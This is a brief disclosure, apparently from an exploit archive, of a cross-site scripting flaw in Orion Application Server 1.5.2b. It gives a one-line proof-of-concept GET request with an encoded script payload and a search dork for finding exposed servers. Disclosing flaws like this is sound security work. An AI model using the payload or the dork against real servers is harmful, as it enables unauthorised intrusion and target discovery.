Orion Application Server version 1.5.2b suffers from a cross site scripting vulnerability.
02f1ed86ad66fd7a0d0c49c57d1af03a# Orion Application Server - Cross Site Scripting
#
# Tested on: Orion Application Server 1.5.2b
# Date: Ago 09, 2020
# Informer: Pablo Rebolini - <rebolini.pablo[x]gmail.com>
# Cross Site Scripting
# Poc:
GET http://x.x.x.x/%3Cscript%3Ealert(%22xss'ed%22)%3C/script%3E
# Dork: "Orion Application Server" "up and running"